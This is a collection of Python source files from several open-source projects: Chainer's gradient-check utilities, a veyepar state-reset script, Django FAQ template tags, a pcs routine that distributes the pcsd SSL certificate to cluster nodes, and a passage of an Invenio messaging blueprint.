Otherwise, it is calculated.
It can be used to reduce the computation if these arrays are
already calculated before calling ``numerical_grad``.
Returns:
tuple: Numerical gradient arrays corresponding to ``inputs``.
"""
assert eps > 0
for x in inputs:
if x.dtype.kind != 'f':
raise RuntimeError(
'The dtype of input arrays must be kind of float')
inputs = tuple(inputs)
grad_outputs = tuple(grad_outputs)
gpu = any(isinstance(x, cuda.ndarray) for x in inputs + grad_outputs)
cpu = any(isinstance(x, numpy.ndarray) for x in inputs + grad_outputs)
if gpu and cpu:
raise RuntimeError('Do not mix GPU and CPU arrays in `numerical_grad`')
if gpu:
xp = cuda.cupy
numerical_grad_kernel_1 = cuda.reduce(
'T y1, T y2, U gy, T eps', 'V gxi',
'(y1 - y2) * gy', 'a + b', 'gxi += a / (eps * 2)', '0',
'numerical_grad_kernel_1'
)
numerical_grad_kernel_3 = cuda.reduce(
'T y1, T y2, T y3, T y4, U gy, T eps', 'V gxi',
'(-y1 + 8 * y2 - 8 * y3 + y4) * gy',
'a + b', 'gxi += a / (eps * 6)', '0',
'numerical_grad_kernel_3'
)
else:
xp = numpy
grads = [xp.zeros(x.shape, numpy.float64) for x in inputs]
if detect_nondifferentiable:
if center_outputs is None:
ys0 = _copy_arrays(f())
else:
ys0 = center_outputs
nout = len(ys0)
shapes = [_.shape for _ in ys0]
sizes = numpy.array([_.size for _ in ys0])
cumsizes = numpy.cumsum(sizes)
# Evaluate func at a single input
def eval_func(x, i, delta, orig):
x[i] = orig + delta
y = _copy_arrays(f())
x[i] = orig
return y
# An iteration on a single input displacement
def iterate_single_input(i_in, x, orig_x, i):
orig = orig_x[i]
# `yss` holds a list of output arrays for each of 2 or 5 sampling
# points.
if detect_nondifferentiable:
yss = [
eval_func(x, i, -eps * 1., orig),
eval_func(x, i, -eps * .5, orig),
ys0,
eval_func(x, i, +eps * .5, orig),
eval_func(x, i, +eps * 1., orig),
]
else:
yss = [
eval_func(x, i, -eps * 1, orig),
eval_func(x, i, +eps * 1, orig),
]
if detect_nondifferentiable:
# Detect non-differentiable point by quadratic fitting
# Check for non-finite output.
# If any single element in the output arrays has different
# finiteness among sampled points, that means this is a
# non-differentiable point.
# If the function consistently generates non-finite values
# around the point, we do not treat the point as
# non-differentiable.
# (Example: x<0 region for the logarithm function)
any_nonfinite = False
for i_out in range(nout):
isfinites = [xp.isfinite(ys[i_out]) for ys in yss]
if any((isfinites[0] != isfinites[i]).any()
for i in range(1, len(yss))):
s = six.StringIO()
s.write(
'Tried to compute the numeric gradient on a '
'non-differentiable point.\n\n')
s.write('i_in: {}\n'.format(i_in))
s.write('i_out: {}\n'.format(i_out))
s.write('x: {}\n'.format(inputs[i_in]))
s.write('index on x: {}\n'.format(i))
s.write('eps: {}\n'.format(eps))
s.write('y[x-eps ]: {}\n'.format(yss[0][i_out]))
s.write('y[x-eps/2]: {}\n'.format(yss[1][i_out]))
s.write('y[x ]: {}\n'.format(yss[2][i_out]))
s.write('y[x+eps/2]: {}\n'.format(yss[3][i_out]))
s.write('y[x+eps ]: {}\n'.format(yss[4][i_out]))
raise NondifferentiableError(s.getvalue())
any_nonfinite |= not all(_.all() for _ in isfinites)
if not any_nonfinite:
                # Stack flattened outputs to make (5, *)-shaped 2D array
ystack = xp.vstack(
[xp.hstack([y.ravel() for y in ys]) for ys in yss])
assert ystack.ndim == 2 and ystack.shape[0] == len(yss)
# Fit to quadratic
if gpu:
ystack = ystack.get()
polyfit = numpy.polynomial.polynomial.polyfit
_, (residuals, _, _, _) = polyfit(
range(len(yss)), ystack, deg=2, full=True)
if gpu:
residuals = xp.array(residuals)
residuals = xp.sqrt(residuals / len(yss))
# Check for error for each output array
for i_out in range(nout):
size = sizes[i_out]
cumsize = cumsizes[i_out]
shape = shapes[i_out]
# TODO(niboshi): The following two lines could be
# rewritten using xp.stack, which is supported in
# NumPy>=1.10
ymax = xp.concatenate(
[ys[i_out][None] for ys in yss]).max(axis=0)
ymin = xp.concatenate(
[ys[i_out][None] for ys in yss]).min(axis=0)
# Restore the shape of flattened residual
res = residuals[cumsize - size:cumsize]
res = res.reshape(shape)
det = xp.asarray(
diff_atol + diff_rtol * (ymax - ymin) < res)
# Constant output = not nondifferentiable
det[ymax == ymin] = False
if det.any():
s = six.StringIO()
s.write(
'Tried to compute the numeric gradient on a '
'non-differentiable point.\n\n')
s.write('i_in: {}\n'.format(i_in))
s.write('i_out: {}\n'.format(i_out))
s.write('x: {}\n'.format(inputs[i_in]))
s.write('index on x: {}\n'.format(i))
s.write('eps: {}\n'.format(eps))
s.write('diff_rtol: {}\n'.format(diff_rtol))
s.write('diff_atol: {}\n'.format(diff_atol))
s.write('ymax: {}\n'.format(ymax))
s.write('ymin: {}\n'.format(ymin))
s.write(
'diff_atol + diff_rtol * (ymax-ymin): {}\n'.format(
diff_atol + diff_rtol * (ymax - ymin)))
s.write('fitting errors: {}\n'.format(res))
s.write('y[x-eps ]: {}\n'.format(yss[0][i_out]))
s.write('y[x-eps/2]: {}\n'.format(yss[1][i_out]))
s.write('y[x ]: {}\n'.format(yss[2][i_out]))
s.write('y[x+eps/2]: {}\n'.format(yss[3][i_out]))
s.write('y[x+eps ]: {}\n'.format(yss[4][i_out]))
raise NondifferentiableError(s.getvalue())
# Calculate numerical gradient
for i_out, gy in enumerate(grad_outputs):
if gy is None:
continue
gpu_ = (gpu and
all(isinstance(ys[i_out], cuda.ndarray)
for ys in yss))
if len(yss) == 2: # 1st order
y0 = yss[0][i_out]
y1 = yss[1][i_out]
if gpu_:
numerical_grad_kernel_1(
y1, y0, xp.asarray(gy), eps, gx[i])
else:
dot = ((y1 - y0) * gy).sum()
gx[i] += dot / (2 * eps)
elif len(yss) == 5: # 3rd order
y0 = yss[0][i_out]
y1 = yss[1][i_out]
y2 = yss[3][i_out]
y3 = yss[4][i_out]
if gpu_:
numerical_grad_kernel_3(
y3, y2, y1, y0, gy, eps, gx[i])
else:
num = -y3 + 8 * y2 - 8 * y1 + y0
dot = (num * gy).sum()
gx[i] += dot / (6 * eps)
else:
assert False
# Calculate numeric gradient
with configuration.using_config('type_check', False):
for i_in, (x, gx) in enumerate(six.moves.zip(inputs, grads)):
orig_x = x.copy() # hold original value
for i in numpy.ndindex(x.shape):
iterate_single_input(i_in, x, orig_x, i)
return [g.astype(x.dtype, copy=False)
for g, x in six.moves.zip(grads, inputs)]
def assert_allclose(x, y, atol=1e-5, rtol=1e-4, verbose=True):
"""Asserts if some corresponding element of x and y differs too much.
This function can handle both CPU and GPU arrays simultaneously.
Args:
x: Left-hand-side array.
y: Right-hand-side array.
atol (float): Absolute tolerance.
rtol (float): Relative tolerance.
verbose (bool): If ``True``, it outputs verbose messages on error.
"""
warnings.warn(
'chainer.gradient_check.assert_allclose is deprecated.'
'Use chainer.testing.assert_allclose instead.',
DeprecationWarning)
testing.assert_allclose(x, y, atol, rtol, verbose)
def _as_tuple(x):
if isinstance(x, tuple):
return x
elif isinstance(x, list):
return tuple(x)
else:
return x,
def _filter_list(lst, ignore_list):
return [x for x, ignore in six.moves.zip(lst, ignore_list) if not ignore]
def check_backward(
func, x_data, y_grad, params=(),
eps=1e-3, atol=1e-5, rtol=1e-4, no_grads=None, dtype=None,
detect_nondifferentiable=False):
"""Test backward procedure of a given function.
This function automatically checks the backward-process of a given function
to ensure that the computed gradients are approximately correct.
For example, assuming you've defined a :class:`~chainer.FunctionNode` class
    ``MyFunc``, which takes two arguments and returns one value, you can wrap
    it in an ordinary function and check its gradient computations as follows:
.. code-block:: python
def func(xs):
y, = MyFunc().apply(xs)
return y
x1_data = xp.array(...)
x2_data = xp.array(...)
gy_data = xp.array(...)
check_backward(func, (x1_data, x2_data), gy_data)
This method creates :class:`~chainer.Variable` objects with ``x_data``
and calls ``func`` with the :class:`~chainer.Variable`\\ s to get its
result as :class:`~chainer.Variable`.
Then, it sets ``y_grad`` array to ``grad`` attribute of the result and
calls ``backward`` method to get gradients of the inputs.
To check correctness of the gradients, the function calls
:func:`numerical_grad` to calculate numerically the gradients and compares
the types of gradients with :func:`chainer.testing.assert_allclose`.
To reduce computational time, it uses directional derivative along a
random vector. A function
:math:`g: \\mathbb{R} \\rightarrow \\mathbb{R}^n` is defined as
:math:`g(\\delta) = f(x + \\delta r)`, where
:math:`\\delta \\in \\mathbb{R}`, :math:`r \\in \\mathbb{R}^n`
is a random vector
and :math:`f` is a function which you want to test.
Its gradient is
.. math::
g'(\\delta) = f'(x + \\delta r) \\cdot r.
Therefore, :math:`g'(0) = f'(x) \\cdot r`.
So we can check the correctness of back propagation of :math:`f` indirectly
by comparing this equation with the gradient of :math:`g` numerically
calculated and that of :math:`f` computed by backprop.
If :math:`r` is chosen from uniform distribution, we can conclude with
high probability that the gradient of :math:`f` itself is correct.
If the function is non-differentiable with respect to some input objects,
we can check its backprop to such objects by ``no_grads`` argument.
``gradient_check`` computes numerical backward to inputs that correspond to
``False`` in ``no_grads``. It also asserts that the backprop leaves
gradients ``None`` for inputs that correspond to ``True`` in ``no_grads``.
The default of ``no_grads`` argument is the tuple of truth values whether
input objects (``x1_data`` or/and ``x2_data`` in this example) represent
integer variables.
You can simplify a test when ``MyFunc`` gets only one argument:
.. code-block:: python
check_backward(func, x1_data, gy_data)
If ``MyFunc`` is a loss function which returns a zero-dimensional
array, pass ``None`` to ``gy_data``. In this case, it sets ``1`` to
``grad`` attribute of the result:
.. code-block:: python
check_backward(my_loss_func,
(x1_data, x2_data), None)
If ``MyFunc`` returns multiple outputs, pass all gradients for outputs
as a tuple:
.. code-block:: python
gy1_data = xp.array(...)
gy2_data = xp.array(...)
check_backward(func, x1_data, (gy1_data, gy2_data))
You can also test a :class:`~chainer.Link`.
To check gradients of parameters of the link, set a tuple of the parameters
to ``params`` arguments:
.. code-block:: python
check_backward(my_link, (x1_data, x2_data), gy_data,
(my_link.W, my_link.b))
Note that ``params`` are not ``ndarray``\\ s,
    but :class:`~chainer.Variable`\\ s.
Function objects are acceptable as ``func`` argument:
.. code-block:: python
check_backward(lambda x1, x2: f(x1, x2),
(x1_data, x2_data), gy_data)
.. note::
``func`` is called many times to get numerical gradients for all inputs.
This function doesn't work correctly when ``func`` behaves randomly as
it gets different gradients.
Args:
func (callable): A function which gets :class:`~chainer.Variable`\\ s
            and returns :class:`~chainer.Variable`\\ s. ``func`` must return
a tuple of :class:`~chainer.Variable`\\ s or one
:class:`~chainer.Variable`. You can use a
:class:`~chainer.Function`, :class:`~chainer.FunctionNode` or a
:class:`~chainer.Link` object or any other function satisfying the
condition.
x_data (ndarray or tuple of ndarrays): A set of ``ndarray``\\ s to be
passed to ``func``. If ``x_data`` is one ``ndarray`` object, it is
treated as ``(x_data,)``.
y_grad (ndarray or tuple of ndarrays or None):
A set of ``ndarray``\\ s representing gradients of return-values of
``func``. If ``y_grad`` is one ``ndarray`` object, it is
treated as ``(y_grad,)``. If ``func`` is a loss-function,
``y_grad`` should be set to ``None``.
        params (~chainer.Variable or tuple of ~chainer.Variable):
A set of :class:`~chainer.Variable`\\ s whose gradients are
checked. When ``func`` is a :class:`~chainer.Link` object,
set its parameters as ``params``.
If ``params`` is one :class:`~chainer.Variable` object,
it is treated as ``(params,)``.
eps (float): Epsilon value to be passed to :func:`numerical_grad`.
atol (float): Absolute tolerance to be passed to
:func:`chainer.testing.assert_allclose`.
rtol (float): Relative tolerance to be passed to
:func:`chainer.testing.assert_allclose`.
no_grads (list of bool): Flag to skip variable for gradient assertion.
It should be same length as ``x_data``.
dtype (~numpy.dtype): ``x_data``, ``y_grad`` and ``params`` are casted
to this dtype when calculating numerical gradients. Only float
types and ``None`` are allowed.
detect_nondifferentiable (bool):
If ``True``, check for non-differentiable inputs is enabled.
If ``func`` is non-differentiable at ``x_data``, ``check_backward``
raises :class:`~chainer.gradient_check.NondifferentiableError`.
.. seealso::
:func:`numerical_grad`
"""
if dtype is not None and numpy.dtype(dtype).kind != 'f':
raise ValueError('`dtype` is allowed only float type')
x_data = _as_tuple(x_data)
if y_grad is not None:
y_grad = _as_tuple(y_grad)
params = _as_tuple(params)
xs = [variable.Variable(x) for x in x_data]
y = func(*xs)
y = _as_tuple(y)
y0_data = [_.data for _ in y]
# All creators of `y` need to be the same because we only call
# `y[0].backward` to call `backward` method of the creator.
# To do so we need to insert a dummy function `_GradientSetter` to the
# computational graph.
# Note that `func` may not be a `Function` object.
y, y_grad = _set_y_grad(y, y_grad)
# Clear gradients which may exist if func calls backward inside of itself.
_clear_grads(xs)
_clear_grads(params)
# We only need to call `backward` for one result `Variable`.
# `Variable.backward` method calls `Function.backward` of its creator.
y.backward()
if no_grads is None:
no_grads = [x.dtype.kind != 'f' for x in xs]
else:
if len(no_grads) != len(xs):
raise ValueError(
'Length of no_grads param and xs should be same.\n'
'Actual: {0} != {1}'.format(len(no_grads), len(xs)))
for skip, x in six.moves.zip(no_grads, xs):
if skip and x.grad is not None:
raise RuntimeError(
'gradient of int variable must be None')
if len(xs) - no_grads.count(True) + len(params) == 0:
# When there is no float variables, we need not to check gradient
# values
return
variables = _filter_list(xs, no_grads) + list(params)
# Keep the gradient arrays of params which may be overwritten by func
grads = [x.grad for x in variables]
if dtype is None:
casted_data = [x.data for x in variables]
else:
if numpy.dtype(dtype).kind != 'f':
raise ValueError('`dtype` is allowed only float type')
casted_data = [x.data.astype(dtype, copy=False) for x in variables]
# Even skipped variable must have the same dtype.
for x, skip in six.moves.zip(xs, no_grads):
if skip and x.data.dtype.kind == 'f':
x.data = x.data.astype(dtype, copy=False)
xp = cuda.get_array_module(*xs)
directions = [xp.random.normal(size=x.shape) for x in variables]
# The direction vector is normalized in order to keep the scale of
# differentiation error invariant with respect to the number of input
# dimensions. Ideally, the scale of the curvature with respect to each
# input dimension should be taken into account, but we ignore the
# differences and assume that the curvature is uniform with respect to all
    # the input dimensions.
norm = math.sqrt(sum([xp.square(d).sum() for d in directions]))
if norm != 0:
# norm could be zero if input arrays are 0-sized.
scale = 1. / norm
directions = [d * scale for d in directions]
delta = xp.array(0., 'd')
def g():
# This functions is called twice in `numerical_grad`.
# `delta` is `epsilon` or `-epsilon` in these calls.
# See the document of `numerical_grad`.
for x, data, direction in six.moves.zip(
variables, casted_data, directions):
            # astype is required to store data with the given type
data = (data.astype('d') +
delta * direction).astype(data.dtype)
if numpy.isscalar(data):
data = xp.array(data)
x.data = data
# Clear gradients to support func that calls backward inside of itself.
_clear_grads(xs)
_clear_grads(params)
ys = func(*xs)
ys = _as_tuple(ys)
ys_data = tuple(y.data for y in ys)
for x, data in six.moves.zip(variables, casted_data):
x.data = data
return ys_data
gx, = numerical_grad(
g, (delta,), y_grad, eps=eps,
detect_nondifferentiable=detect_nondifferentiable,
center_outputs=y0_data)
gx_accum = 0
for g, direction in six.moves.zip(grads, directions):
if g is not None:
gx_accum += (g.astype('d') * direction).sum()
try:
testing.assert_allclose(gx, gx_accum, atol=atol, rtol=rtol)
except AssertionError as e:
f = six.StringIO()
f.write('check_backward failed (eps={} atol={} rtol={})\n'.format(
eps, atol, rtol))
for i, x_ in enumerate(xs):
f.write('inputs[{}]:\n'.format(i))
f.write('{}\n'.format(x_))
for i, gy_ in enumerate(y_grad):
f.write('grad_outputs[{}]:\n'.format(i))
f.write('{}\n'.format(gy_))
for i, d_ in enumerate(directions):
f.write('directions[{}]:\n'.format(i))
f.write('{}\n'.format(d_))
f.write('gradients (numeric): {}\n'.format(gx))
f.write('gradients (backward): {}\n'.format(gx_accum))
f.write('\n')
f.write(str(e))
raise AssertionError(f.getvalue())
def check_double_backward(func, x_data, y_grad, x_grad_grad, params=(),
params_grad_grad=(), eps=1e-3, atol=1e-4, rtol=1e-3,
no_grads=None, dtype=None,
detect_nondifferentiable=False):
"""Test twice differentiation of a given procedure.
This function automatically checks if the backward procedure of ``func``
is correctly implemented for further differentiation. It first computes the
gradient of ``func`` w.r.t. its inputs in the same way as
:func:`~chainer.gradient_check.check_backward`. This function then further
invokes the backward procedure against the gradient variables, starting
from the initial gradient given by ``x_grad_grad``. It also computes the
second gradient using :func:`~chainer.gradient_check.numerical_grad`. The
resulting gradients are compared to confirm if the second-order gradients
are approximately correct.
Note that this function **DOES NOT** check if the first-order
differentiation is correct; the numerical gradient assumes that the
first-order gradient given by the usual :meth:`chainer.Variable.backward`
is correct. The implementation of each differentiable function should be
tested by :func:`~chainer.gradient_check.check_backward` first, and then
    should be tested by this function if necessary.
For the details of the arguments, see
:func:`~chainer.gradient_check.check_backward`. The additional arguments
``x_grad_grad`` and ``params_grad_grad`` are (tuples of)
:class:`~chainer.Variable` (s) that include the initial gradient
corresponding to the first-order gradient of each input and parameter. Note
that the default error tolerance ``atol`` and ``rtol`` are slightly larger
than those of :func:`~chainer.gradient_check.check_backward` because the
numerical gradients of the second order differentiation are less accurate
than those of the first order gradients.
"""
x_data = _as_tuple(x_data)
params = _as_tuple(params)
y_grad = _as_tuple(y_grad)
x_grad_grad = _as_tuple(x_grad_grad)
params_grad_grad = _as_tuple(params_grad_grad)
n_x = len(x_data)
first_order_no_grads = [x.dtype.kind != 'f' for x in x_data]
def first_order_grad(*inputs):
xs = inputs[:n_x]
gys = inputs[n_x:]
y = _as_tuple(func(*xs))
# Let all elements of y share the same creator.
# See the comment in check_backward.
y, _ = _set_y_grad(y, gys)
y.backward(enable_double_backprop=True)
gxs = []
for skip, x in six.moves.zip(first_order_no_grads, xs):
if skip:
if x.grad is not None:
raise RuntimeError(
'gradient of int variable must be None')
else:
if x.grad is None:
raise RuntimeError(
'gradients of some arguments are not calculated')
gxs.append(x.grad_var)
return tuple(gxs + [p.grad_var for p in params])
inputs = x_data + y_grad
grad_grad = x_grad_grad + params_grad_grad
try:
check_backward(first_order_grad, inputs, grad_grad, params=params,
eps=eps, atol=atol, rtol=rtol, no_grads=no_grads,
dtype=dtype,
detect_nondifferentiable=detect_nondifferentiable)
except AssertionError as e:
f = six.StringIO()
f.write('check_double_backward failed '
'(eps={} atol={} rtol={})\n'.format(eps, atol, rtol))
for i, x_ in enumerate(x_data):
f.write('input[{}]:\n'.format(i))
f.write('{}\n'.format(x_))
for i, gy_ in enumerate(y_grad):
f.write('grad_output[{}]:\n'.format(i))
f.write('{}\n'.format(gy_))
for i, ggx_ in enumerate(x_grad_grad):
f.write('grad_grad_input[{}]:\n'.format(i))
f.write('{}\n'.format(ggx_))
for i, ggp_ in enumerate(params_grad_grad):
f.write('grad_grad_param[{}]:\n'.format(i))
f.write('{}\n'.format(ggp_))
f.write('\n')
f.write(str(e))
raise AssertionError(f.getvalue())
class _GradientSetter(FunctionNode):
def __init__(self, grad):
self.grad = grad
def forward(self, inputs):
xp = cuda.get_array_module(inputs[0])
if self.grad is None:
y0, = inputs
gy0 = xp.ones_like(y0)
assert gy0.size == 1
self.grad = (gy0,)
# output a 0-sized 1-dim array like inputs
return xp.empty((0,), dtype=inputs[0].dtype),
def backward(self, inputs, grad_outputs):
grad = self.grad
return tuple(
None if g is None else variable.as_variable(g)
for g in grad)
def _set_y_grad(y, y_grad):
if y_grad is not None:
if len(y) != len(y_grad):
raise ValueError(
'Upstream gradients must contain equally many elements as '
'number of output elements.\n'
'Actual: {} != {}'.format(len(y), len(y_grad)))
y, = _GradientSetter(y_grad).apply(y)
else:
if len(y) != 1:
raise ValueError(
'Function must return a zero-dimensional array of length 1 '
'if the upstream gradient is `None`.\n'
'Actual: {} != 1'.format(len(y)))
y, = _GradientSetter(None).apply(y)
y_grad = (1,)
return y, y_grad
def _clear_grads(xs):
for x in xs:
x.grad_var = None
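# --- Usage sketch (not part of the original module) --------------------------
# A small, hedged end-to-end example of the pattern described in the
# check_backward docstring, using chainer.functions.tanh as a stand-in for a
# custom FunctionNode. Shapes, epsilon, and tolerances are illustrative.
if __name__ == '__main__':
    import chainer.functions as F

    x = numpy.random.uniform(-1, 1, (3, 4)).astype(numpy.float32)
    gy = numpy.random.uniform(-1, 1, (3, 4)).astype(numpy.float32)
    ggx = numpy.random.uniform(-1, 1, (3, 4)).astype(numpy.float32)

    # First-order gradient check against numerical_grad.
    check_backward(F.tanh, x, gy, eps=1e-3, atol=1e-4, rtol=1e-3)
    # Second-order check, seeded with an initial gradient for the gradient.
    check_double_backward(F.tanh, x, gy, ggx, atol=1e-3, rtol=1e-2)
    print('gradient checks passed')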
|
ronekko/chainer
|
chainer/gradient_check.py
|
Python
|
mit
| 29,683
|
#!/usr/bin/python
# fix.py - mass fix some goof
from process import process
from main.models import Show, Location, Episode, Raw_File, Cut_List
class fix(process):
# this will bump everything from 5 back to 4
ready_state = 7
def process_ep(self, ep):
if self.options.verbose: print(ep.id, ep.name)
ep.state = 4
ep.save()
        ret = False  # return False, otherwise the state will be bumped +1
return ret
if __name__ == '__main__':
p=fix()
p.main()
|
CarlFK/veyepar
|
dj/scripts/fix.py
|
Python
|
mit
| 492
|
from __future__ import absolute_import
from django import template
from ..models import Question, Topic
register = template.Library()
class FaqListNode(template.Node):
def __init__(self, num, varname, topic=None):
self.num = template.Variable(num)
self.topic = template.Variable(topic) if topic else None
self.varname = varname
def render(self, context):
try:
num = self.num.resolve(context)
topic = self.topic.resolve(context) if self.topic else None
except template.VariableDoesNotExist:
return ''
if isinstance(topic, Topic):
qs = Question.objects.filter(topic=topic)
elif topic is not None:
qs = Question.objects.filter(topic__slug=topic)
else:
qs = Question.objects.all()
context[self.varname] = qs.filter(status=Question.ACTIVE)[:num]
return ''
@register.tag
def faqs_for_topic(parser, token):
"""
    Returns a list of 'count' FAQs that belong to the given topic.
    The supplied topic argument must be in the slug format 'topic-name'.
Example usage::
{% faqs_for_topic 5 "my-slug" as faqs %}
"""
args = token.split_contents()
if len(args) != 5:
raise template.TemplateSyntaxError("%s takes exactly four arguments" % args[0])
if args[3] != 'as':
raise template.TemplateSyntaxError("third argument to the %s tag must be 'as'" % args[0])
return FaqListNode(num=args[1], topic=args[2], varname=args[4])
@register.tag
def faq_list(parser, token):
"""
    Returns a generic list of 'count' FAQs to display in a list,
    ordered by the FAQ sort order.
Example usage::
{% faq_list 15 as faqs %}
"""
args = token.split_contents()
if len(args) != 4:
raise template.TemplateSyntaxError("%s takes exactly three arguments" % args[0])
if args[2] != 'as':
raise template.TemplateSyntaxError("second argument to the %s tag must be 'as'" % args[0])
return FaqListNode(num=args[1], varname=args[3])
class TopicListNode(template.Node):
def __init__(self, varname):
self.varname = varname
def render(self, context):
context[self.varname] = Topic.objects.all()
return ''
@register.tag
def faq_topic_list(parser, token):
"""
Returns a list of all FAQ Topics.
Example usage::
{% faq_topic_list as topic_list %}
"""
args = token.split_contents()
if len(args) != 3:
raise template.TemplateSyntaxError("%s takes exactly two arguments" % args[0])
if args[1] != 'as':
raise template.TemplateSyntaxError("second argument to the %s tag must be 'as'" % args[0])
return TopicListNode(varname=args[2])
|
Mercy-Nekesa/sokoapp
|
sokoapp/fack/templatetags/faqtags.py
|
Python
|
mit
| 2,785
|
from pcs import settings
from pcs.common import (
file_type_codes,
reports,
)
from pcs.common.file import RawFileError
from pcs.common.reports.item import ReportItem
from pcs.common.tools import format_environment_error
from pcs.lib.communication.nodes import SendPcsdSslCertAndKey
from pcs.lib.communication.tools import run_and_raise
from pcs.lib.env import LibraryEnvironment
from pcs.lib.errors import LibraryError
from pcs.lib.node import get_existing_nodes_names
def synchronize_ssl_certificate(env: LibraryEnvironment, skip_offline=False):
"""
Send the local pcsd SSL cert and key to all full nodes in the local cluster.
Consider the pcs Web UI is accessed via an IP running as a resource in the
cluster. When the IP is moved, the user's browser connects to the new node
and we want it to get the same certificate to make the transition a
    seamless experience (otherwise the browser displays a warning that the
certificate has changed).
Using pcsd Web UI on remote and guest nodes is not supported (pcs/pcsd
    depends on the corosync.conf file being present on the local node) so we
    send the cert only to corosync (== full stack) nodes.
"""
report_processor = env.report_processor
target_factory = env.get_node_target_factory()
cluster_nodes_names, report_list = get_existing_nodes_names(
env.get_corosync_conf()
)
if not cluster_nodes_names:
report_list.append(
ReportItem.error(reports.messages.CorosyncConfigNoNodesDefined())
)
report_processor.report_list(report_list)
try:
with open(settings.pcsd_cert_location, "r") as file:
ssl_cert = file.read()
except EnvironmentError as e:
report_processor.report(
ReportItem.error(
reports.messages.FileIoError(
file_type_codes.PCSD_SSL_CERT,
RawFileError.ACTION_READ,
format_environment_error(e),
file_path=settings.pcsd_cert_location,
)
)
)
try:
with open(settings.pcsd_key_location, "r") as file:
ssl_key = file.read()
except EnvironmentError as e:
report_processor.report(
ReportItem.error(
reports.messages.FileIoError(
file_type_codes.PCSD_SSL_KEY,
RawFileError.ACTION_READ,
format_environment_error(e),
file_path=settings.pcsd_key_location,
)
)
)
(
target_report_list,
target_list,
) = target_factory.get_target_list_with_reports(
cluster_nodes_names, skip_non_existing=skip_offline
)
report_processor.report_list(target_report_list)
if report_processor.has_errors:
raise LibraryError()
env.report_processor.report(
ReportItem.info(
reports.messages.PcsdSslCertAndKeyDistributionStarted(
sorted([target.label for target in target_list])
)
)
)
com_cmd = SendPcsdSslCertAndKey(env.report_processor, ssl_cert, ssl_key)
com_cmd.set_targets(target_list)
run_and_raise(env.get_node_communicator(), com_cmd)
|
tomjelinek/pcs
|
pcs/lib/commands/pcsd.py
|
Python
|
gpl-2.0
| 3,265
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2011, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""WebMessage Flask Blueprint"""
from datetime import datetime
from flask import render_template, request, flash, redirect, url_for, Blueprint
from flask.ext.breadcrumbs import default_breadcrumb_root, register_breadcrumb
from flask.ext.login import current_user, login_required
from flask.ext.menu import register_menu
from sqlalchemy.sql import operators
from invenio.base.decorators import (wash_arguments, templated, sorted_by,
filtered_by)
from invenio.base.globals import cfg
from invenio.base.i18n import _
from invenio.ext.template import render_template_to_string
from invenio.ext.principal import permission_required
from invenio.ext.sqlalchemy import db
from . import dblayer
from . import query as dbquery
from .forms import AddMsgMESSAGEForm, FilterMsgMESSAGEForm
from .models import MsgMESSAGE, UserMsgMESSAGE, email_alert_register
class MessagesMenu(object):
def __str__(self):
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
unread = db.session.query(db.func.count(UserMsgMESSAGE.id_msgMESSAGE)).\
filter(db.and_(
UserMsgMESSAGE.id_user_to == uid,
UserMsgMESSAGE.status == cfg['CFG_WEBMESSAGE_STATUS_CODE']['NEW']
)).scalar()
return render_template_to_string("messages/menu_item.html", unread=unread)
not_guest = lambda: not current_user.is_guest
blueprint = Blueprint('webmessage', __name__, url_prefix="/yourmessages",
template_folder='templates', static_folder='static')
default_breadcrumb_root(blueprint, '.webaccount.messages')
@blueprint.route('/menu', methods=['GET'])
#FIXME if request is_xhr then do not return 401
#@login_required
#@permission_required('usemessages')
#@templated('messages/menu.html')
def menu():
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
# join: msgMESSAGE -> user_msgMESSAGE, msgMESSAGE -> users
# filter: all messages from user AND filter form
# order: sorted by one of the table column
messages = db.session.query(MsgMESSAGE, UserMsgMESSAGE).\
join(MsgMESSAGE.user_from, MsgMESSAGE.sent_to_users).\
filter(db.and_(dbquery.filter_all_messages_from_user(uid))).\
order_by(db.desc(MsgMESSAGE.received_date)).limit(5)
#return dict(messages=messages.all())
return render_template('messages/menu.html', messages=messages.all())
@blueprint.route('/', methods=['GET', 'POST'])
@blueprint.route('/index', methods=['GET', 'POST'])
@blueprint.route('/display', methods=['GET', 'POST'])
@login_required
@permission_required('usemessages')
@sorted_by(MsgMESSAGE)
@filtered_by(MsgMESSAGE, columns={
'subject': operators.startswith_op,
'user_from.nickname': operators.contains_op},
form=FilterMsgMESSAGEForm)
@templated('messages/index.html')
@register_breadcrumb(blueprint, '.', _('Your Messages'))
@register_menu(blueprint, 'personalize.messages', _('Your messages'), order=10)
@register_menu(blueprint, 'main.messages', MessagesMenu(), order=-3,
visible_when=not_guest)
def index(sort=False, filter=None):
from invenio.legacy.webmessage.api import is_no_quota_user
uid = current_user.get_id()
dbquery.update_user_inbox_for_reminders(uid)
# join: msgMESSAGE -> user_msgMESSAGE, msgMESSAGE -> users
# filter: all messages from user AND filter form
# order: sorted by one of the table column
messages = db.session.query(MsgMESSAGE, UserMsgMESSAGE).\
join(MsgMESSAGE.user_from, MsgMESSAGE.sent_to_users).\
filter(db.and_(dbquery.filter_all_messages_from_user(uid), (filter))).\
order_by(sort)
return dict(messages=messages.all(),
nb_messages=dbquery.count_nb_messages(uid),
no_quota=is_no_quota_user(uid))
@blueprint.route("/add", methods=['GET', 'POST'])
@blueprint.route("/write", methods=['GET', 'POST'])
@register_breadcrumb(blueprint, '.add', _('Write a message'))
@login_required
@permission_required('usemessages')
@wash_arguments({'msg_reply_id': (int, 0)})
def add(msg_reply_id):
from invenio.utils.mail import email_quote_txt
uid = current_user.get_id()
if msg_reply_id:
if (dblayer.check_user_owns_message(uid, msg_reply_id) == 0):
            flash(_('Sorry, this message is not in your mailbox.'), "error")
return redirect(url_for('.index'))
else:
try:
m = dbquery.get_message(uid, msg_reply_id)
message = MsgMESSAGE()
message.sent_to_user_nicks = m.message.user_from.nickname \
or str(m.message.id_user_from)
message.subject = _("Re:") + " " + m.message.subject
message.body = email_quote_txt(m.message.body)
form = AddMsgMESSAGEForm(request.form, obj=message)
return render_template('messages/add.html', form=form)
